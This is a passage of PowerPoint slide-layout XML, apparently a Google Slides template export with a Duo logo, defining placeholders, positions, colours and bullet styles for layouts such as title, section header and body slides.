            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5980436" y="766459"/>
            <a:ext cx="2232351" cy="3610576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295400" y="582175"/>
            <a:ext cx="5620800" cy="80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 name="Google Shape;85;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295400" y="2298875"/>
            <a:ext cx="4703100" cy="170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6" name="Google Shape;86;p1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87" name="Google Shape;87;p15"/>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1 - Subtitle (plain)">
  <p:cSld name="SECTION_HEADER_1">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90" name="Google Shape;90;p16"/>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91" name="Google Shape;91;p1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92" name="Google Shape;92;p16"/>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2 - Subtitle (pattern)">
  <p:cSld name="SECTION_HEADER_1_1">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63F44"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="363F4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95" name="Google Shape;95;p17"/>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96" name="Google Shape;96;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4551700" y="-3369206"/>
            <a:ext cx="9143999" cy="4301612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97" name="Google Shape;97;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4592300" y="4211094"/>
            <a:ext cx="9143999" cy="4301612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;98;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4878650"/>
            <a:ext cx="50223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99" name="Google Shape;99;p17"/>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4 - Body with bullets (left)" type="tx">
  <p:cSld name="TITLE_AND_BODY">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8"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Google Shape;103;p18"/>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04" name="Google Shape;104;p1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05" name="Google Shape;105;p18"/>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5 - Body with bullets (left and pattern)">
  <p:cSld name="TITLE_AND_BODY_1">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19"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="109" name="Google Shape;109;p19"/>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110" name="Google Shape;110;p19"/>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111" name="Google Shape;111;p19"/>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12" name="Google Shape;112;p1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6 - Body with bullets (double)" type="twoColTx">
  <p:cSld name="TITLE_AND_TWO_COLUMNS">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Clr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;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Clr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="Google Shape;117;p20"/>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18" name="Google Shape;118;p2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19" name="Google Shape;119;p20"/>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2 - Title (plain navy)">
  <p:cSld name="TITLE_2_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>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294075" y="797050"/>
            <a:ext cx="5039700" cy="2442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 name="Google Shape;17;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="3239050"/>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8" name="Google Shape;18;p3" descr="Duo Logo White@2x.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="384681" y="4327931"/>
            <a:ext cx="1513500" cy="490375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;19;p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0" name="Google Shape;20;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192000" y="4579749"/>
            <a:ext cx="1320700" cy="2385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7 - Body (title only)" type="titleOnly">
  <p:cSld name="TITLE_ONLY">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23" name="Google Shape;123;p2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24" name="Google Shape;124;p21"/>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8 - Body (no details, pattern)">
  <p:cSld name="TITLE_ONLY_1">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7" name="Google Shape;127;p22"/>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128" name="Google Shape;128;p22"/>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129" name="Google Shape;129;p22"/>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30" name="Google Shape;130;p22"/>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9 - Body with bullets (narrow)">
  <p:cSld name="ONE_COLUMN_TEXT">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23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1389600"/>
            <a:ext cx="33408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134" name="Google Shape;134;p23"/>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35" name="Google Shape;135;p2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36" name="Google Shape;136;p23"/>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3 - Subtitle (plain)">
  <p:cSld name="MAIN_POIN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139" name="Google Shape;139;p24"/>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40" name="Google Shape;140;p2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41" name="Google Shape;141;p24"/>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4 - Subtitle (green)">
  <p:cSld name="MAIN_POINT_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>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144" name="Google Shape;144;p2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145" name="Google Shape;145;p2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146" name="Google Shape;146;p25"/>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5 - Subtitle (navy)">
  <p:cSld name="MAIN_POINT_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="374044"/>
        </a:solid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149" name="Google Shape;149;p2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150" name="Google Shape;150;p2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151" name="Google Shape;151;p26"/>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9 - Body (image right)">
  <p:cSld name="SECTION_TITLE_AND_DESCRIPTION">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 152"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265500" y="1233175"/>
            <a:ext cx="413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5" name="Google Shape;155;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265500" y="2803075"/>
            <a:ext cx="41352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pic>
        <p:nvPicPr>
          <p:cNvPr id="156" name="Google Shape;156;p27"/>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57" name="Google Shape;157;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341700" y="4878650"/>
            <a:ext cx="88785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58" name="Google Shape;158;p27"/>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10 - Body (image left)">
  <p:cSld name="SECTION_TITLE_AND_DESCRIPTION_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 159"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008800" y="1233175"/>
            <a:ext cx="36006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62" name="Google Shape;162;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008800" y="2803075"/>
            <a:ext cx="36006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3" name="Google Shape;163;p2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64" name="Google Shape;164;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850700" y="4700875"/>
            <a:ext cx="984229" cy="177775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165" name="Google Shape;165;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132725" y="4700872"/>
            <a:ext cx="548700" cy="17777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11 - Body (recap of main points, pattern)">
  <p:cSld name="CUSTOM_8_1">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 name="Google Shape;168;p29"/>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69" name="Google Shape;169;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-626250" y="2469818"/>
            <a:ext cx="1258800" cy="12588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8098513" y="804077"/>
            <a:ext cx="1258800" cy="12588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3117275" y="3534819"/>
            <a:ext cx="2301600" cy="2301600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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29"/>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173" name="Google Shape;173;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800"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174" name="Google Shape;174;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163775"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175" name="Google Shape;175;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5922750"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176" name="Google Shape;176;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6141375" y="4497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77" name="Google Shape;177;p2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12 - Body (green left, bullets right)">
  <p:cSld name="CUSTOM_9">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 178"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4565400" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rec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30"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p30"/>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63F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="Google Shape;183;p3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184" name="Google Shape;184;p3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85" name="Google Shape;185;p30"/>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3 - Title (right side)">
  <p:cSld name="TITLE_1_1_1">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23" name="Google Shape;23;p4" descr="kendra_windows-laptop_microsoft-phone.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="31478"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="671675"/>
            <a:ext cx="3623400" cy="3685200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Google Shape;24;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4603500" y="519275"/>
            <a:ext cx="4311900" cy="1857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5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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4603500" y="3393038"/>
            <a:ext cx="3794100" cy="1485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6" name="Google Shape;26;p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27" name="Google Shape;27;p4"/>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12 - Body (green left, bullets right) 1">
  <p:cSld name="CUSTOM_9_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 186"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4565400" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rec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pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Google Shape;189;p3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190" name="Google Shape;190;p3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91" name="Google Shape;191;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122775" y="4700875"/>
            <a:ext cx="984229" cy="177775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="3866700" cy="96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 name="Google Shape;193;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1457575"/>
            <a:ext cx="3773700" cy="2787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13 - Body (navy left, bullets right)">
  <p:cSld name="CUSTOM_9_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 194"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4565400" cy="51435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32"/>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rgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p32"/>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6BBF4E"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
